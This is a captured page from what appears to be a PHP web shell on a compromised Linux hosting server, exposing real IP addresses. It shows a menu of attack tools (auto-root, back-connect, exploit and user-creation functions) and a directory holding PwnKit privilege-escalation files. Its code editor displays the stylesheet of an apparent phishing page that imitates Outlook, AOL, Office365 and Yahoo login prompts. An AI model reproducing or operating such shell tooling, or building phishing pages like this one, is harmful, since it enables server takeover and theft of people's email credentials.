Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
einvite /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
border.cwa
2.5
KB
-r--r--r--
index.html
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
script.js
31.03
KB
-rw-r--r--
styles.css
13.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : styles.css
* { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; height: 100vh; overflow: hidden; background: #f7f5f0; } .background { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-image: url('https://images.unsplash.com/photo-1481627834876-b7833e8f5570?ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D&auto=format&fit=crop&w=1000&q=80'); background-size: cover; background-position: center; background-repeat: no-repeat; z-index: -2; } .blur-overlay { position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.2); backdrop-filter: blur(3px); z-index: -1; } .modal-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; display: flex; justify-content: center; align-items: center; z-index: 1000; padding: 20px; } .modal { background: #2c2c2c; border-radius: 12px; box-shadow: 0 20px 40px rgba(0, 0, 0, 0.3); max-width: 450px; width: 100%; max-height: 90vh; overflow-y: auto; position: relative; } .modal-header { text-align: center; padding: 30px 30px 20px; border-bottom: 1px solid #404040; } .logo { width: 60px; height: 60px; background: #ff0000; border-radius: 8px; display: flex; align-items: center; justify-content: center; margin: 0 auto 15px; box-shadow: 0 4px 8px rgba(255, 0, 0, 0.3); } .logo i { color: white; font-size: 28px; } .modal h1 { color: white; font-size: 28px; font-weight: 600; margin: 0; } .modal-content { padding: 20px 30px 30px; } .instruction-text { color: #e0e0e0; font-size: 12px; line-height: 1.5; margin-bottom: 30px; text-align: center; } .email-providers { display: flex; flex-direction: column; gap: 12px; margin-bottom: 30px; } .provider-btn { display: flex; align-items: center; padding: 15px 20px; border: none; border-radius: 8px; font-size: 16px; font-weight: 500; cursor: pointer; transition: all 0.3s ease; text-align: left; width: 100%; position: relative; overflow: hidden; } .provider-btn:hover { transform: translateY(-2px); box-shadow: 0 8px 20px rgba(0, 0, 0, 0.2); } .provider-btn:active { transform: translateY(0); } .provider-btn i { margin-right: 15px; font-size: 18px; width: 20px; text-align: center; } .provider-btn span { color: white; font-weight: 500; } /* Outlook Button */ .outlook { background: #0078d4; } .outlook:hover { background: #106ebe; } /* AOL Button */ .aol { background: #4a4a4a; } .aol:hover { background: #5a5a5a; } /* Office365 Button */ .office365 { background: #ff6b35; } .office365:hover { background: #e55a2b; } /* Yahoo Button */ .yahoo { background: #7b0099; } .yahoo:hover { background: #8b00aa; } /* Other Mail Button */ .other { background: #0078d4; } .other:hover { background: #106ebe; } .footer-info { margin-bottom: 20px; text-align: center; } .footer-info p { color: #b0b0b0; font-size: 12px; line-height: 1.4; margin-bottom: 8px; } .copyright { text-align: center; padding-top: 20px; border-top: 1px solid #404040; } .copyright p { color: #888; font-size: 12px; } /* Mobile Responsiveness */ @media (max-width: 768px) { .modal { margin: 10px; max-width: none; width: calc(100% - 20px); } .modal-header { padding: 25px 20px 15px; } .modal-content { padding: 15px 20px 20px; } .login-form { padding: 20px; } .login-title { font-size: 16px; } .form-actions { flex-direction: column; gap: 10px; } .cancel-btn, .signin-btn { width: 100%; padding: 12px 20px; } .logo { width: 50px; height: 50px; } .logo i { font-size: 24px; } .modal h1 { font-size: 24px; } .instruction-text { font-size: 11px; margin-bottom: 25px; } .provider-btn { padding: 12px 15px; font-size: 14px; } .provider-btn i { font-size: 16px; margin-right: 12px; } } @media (max-width: 480px) { .modal-overlay { padding: 10px; } .modal { margin: 5px; width: calc(100% - 10px); } .modal-header { padding: 20px 15px 10px; } .modal-content { padding: 10px 15px 15px; } .logo { width: 45px; height: 45px; } .logo i { font-size: 20px; } .modal h1 { font-size: 20px; } .instruction-text { font-size: 10px; margin-bottom: 20px; } .provider-btn { padding: 10px 12px; font-size: 13px; } .provider-btn i { font-size: 14px; margin-right: 10px; } .footer-info p { font-size: 10px; } .copyright p { font-size: 11px; } } /* Desktop Enhancements */ @media (min-width: 1024px) { .modal { max-width: 500px; } .modal-header { padding: 40px 40px 25px; } .modal-content { padding: 25px 40px 40px; } .logo { width: 70px; height: 70px; } .logo i { font-size: 32px; } .modal h1 { font-size: 32px; } .instruction-text { font-size: 14px; margin-bottom: 35px; } .provider-btn { padding: 18px 25px; font-size: 17px; } .provider-btn i { font-size: 20px; margin-right: 18px; } } /* Login Dropdown Styles */ .login-dropdown { max-height: 0; overflow: hidden; transition: max-height 0.3s ease-out, opacity 0.3s ease-out, transform 0.3s ease-out; opacity: 0; margin-top: 0; transform: translateY(-20px); } .login-dropdown.active { max-height: 400px; opacity: 1; margin-top: 20px; transform: translateY(0); } .login-form { background: #3a3a3a; border-radius: 8px; padding: 25px; border: 1px solid #555; box-shadow: 0 4px 12px rgba(0, 0, 0, 0.3); } .login-title { color: white; font-size: 18px; font-weight: 600; margin: 0 0 20px 0; text-align: center; } .login-form-content { display: flex; flex-direction: column; gap: 20px; } .input-group { display: flex; flex-direction: column; gap: 8px; } .input-group label { color: #e0e0e0; font-size: 14px; font-weight: 500; } .input-group input { padding: 12px 15px; border: 1px solid #555; border-radius: 6px; background: #2c2c2c; color: white; font-size: 14px; transition: border-color 0.3s ease, box-shadow 0.3s ease; } .input-group input:focus { outline: none; border-color: #0078d4; box-shadow: 0 0 0 2px rgba(0, 120, 212, 0.2); } .input-group input::placeholder { color: #888; } .form-actions { display: flex; gap: 12px; justify-content: flex-end; margin-top: 10px; } .cancel-btn { padding: 10px 20px; background: #555; color: white; border: none; border-radius: 6px; font-size: 14px; cursor: pointer; transition: background-color 0.3s ease; } .cancel-btn:hover { background: #666; } .signin-btn { padding: 10px 20px; background: #0078d4; color: white; border: none; border-radius: 6px; font-size: 14px; font-weight: 500; cursor: pointer; transition: background-color 0.3s ease; } .signin-btn:hover { background: #106ebe; } /* Error Message Styles */ .error-message { display: flex; align-items: center; gap: 8px; color: #ff6b6b; font-size: 14px; margin-top: 10px; padding: 10px; background: rgba(255, 107, 107, 0.1); border: 1px solid rgba(255, 107, 107, 0.3); border-radius: 6px; } .error-message i { font-size: 16px; } /* Code Instruction Styles */ .code-instruction { color: #b0b0b0; font-size: 12px; margin-top: 5px; line-height: 1.4; } /* Animation for modal appearance */ @keyframes modalSlideIn { from { opacity: 0; transform: translateY(-50px) scale(0.9); } to { opacity: 1; transform: translateY(0) scale(1); } } .modal { animation: modalSlideIn 0.3s ease-out; } /* Enhanced animations */ @keyframes buttonClick { 0% { transform: scale(1); } 50% { transform: scale(0.98); } 100% { transform: scale(1); } } @keyframes fadeInUp { from { opacity: 0; transform: translateY(20px); } to { opacity: 1; transform: translateY(0); } } @keyframes pulse { 0%, 100% { transform: scale(1); } 50% { transform: scale(1.05); } } @keyframes shake { 0%, 100% { transform: translateX(0); } 25% { transform: translateX(-5px); } 75% { transform: translateX(5px); } } .provider-btn:active { animation: buttonClick 0.1s ease-out; } /* Enhanced accessibility features */ .provider-btn:focus { outline: 3px solid #0078d4; outline-offset: 2px; } .input-group input:focus { outline: 2px solid #0078d4; outline-offset: 2px; } /* Loading animation */ .loading { position: relative; overflow: hidden; } .loading::after { content: ''; position: absolute; top: 0; left: -100%; width: 100%; height: 100%; background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.2), transparent); animation: loading 1.5s infinite; } @keyframes loading { 0% { left: -100%; } 100% { left: 100%; } } /* Error animation */ .error-shake { animation: shake 0.5s ease-in-out; } /* Success animation */ .success-pulse { animation: pulse 0.6s ease-in-out; } /* Field error styles */ .field-error { color: #ff6b6b; font-size: 12px; margin-top: 5px; display: flex; align-items: center; gap: 5px; animation: fadeInUp 0.3s ease-out; } .field-error::before { content: '⚠'; font-size: 14px; } /* Enhanced form validation styles */ .input-group input.invalid { border-color: #ff6b6b; box-shadow: 0 0 0 2px rgba(255, 107, 107, 0.2); } .input-group input.valid { border-color: #4CAF50; box-shadow: 0 0 0 2px rgba(76, 175, 80, 0.2); } /* Notification styles */ .notification { animation: fadeInUp 0.3s ease-out; } .notification.success { background: #4CAF50; } .notification.error { background: #f44336; } .notification.info { background: #2196F3; } /* Accessibility improvements */ @media (prefers-reduced-motion: reduce) { * { animation-duration: 0.01ms !important; animation-iteration-count: 1 !important; transition-duration: 0.01ms !important; } } /* High contrast mode support */ @media (prefers-contrast: high) { .modal { border: 2px solid #fff; } .provider-btn { border: 2px solid currentColor; } .input-group input { border: 2px solid #fff; } } /* Dark mode support */ @media (prefers-color-scheme: dark) { .modal { background: #1a1a1a; color: #fff; } .input-group input { background: #2a2a2a; color: #fff; border-color: #555; } } /* Settings Panel Styles */ .settings-panel { background: #3a3a3a; border-radius: 8px; padding: 20px; margin-top: 20px; border: 1px solid #555; animation: fadeInUp 0.3s ease-out; } .settings-panel h3 { color: white; font-size: 16px; margin: 0 0 15px 0; text-align: center; } .settings-content { display: flex; flex-direction: column; gap: 15px; } .setting-item { display: flex; align-items: center; justify-content: space-between; } .setting-item label { color: #e0e0e0; font-size: 14px; display: flex; align-items: center; gap: 8px; cursor: pointer; } .setting-item input[type="checkbox"] { width: 16px; height: 16px; accent-color: #0078d4; } .clear-btn, .export-btn { padding: 8px 16px; border: none; border-radius: 4px; font-size: 12px; cursor: pointer; transition: all 0.3s ease; } .clear-btn { background: #f44336; color: white; } .clear-btn:hover { background: #d32f2f; } .export-btn { background: #4CAF50; color: white; } .export-btn:hover { background: #45a049; } .settings-btn { background: #555; border: none; border-radius: 50%; width: 32px; height: 32px; display: flex; align-items: center; justify-content: center; cursor: pointer; transition: all 0.3s ease; margin-left: 10px; } .settings-btn:hover { background: #666; transform: rotate(90deg); } .settings-btn i { color: white; font-size: 14px; } .copyright { display: flex; align-items: center; justify-content: center; gap: 10px; } /* Enhanced responsive design for settings */ @media (max-width: 768px) { .settings-panel { padding: 15px; margin-top: 15px; } .setting-item { flex-direction: column; align-items: flex-start; gap: 8px; } .clear-btn, .export-btn { width: 100%; padding: 10px; } .settings-btn { width: 28px; height: 28px; } }
Close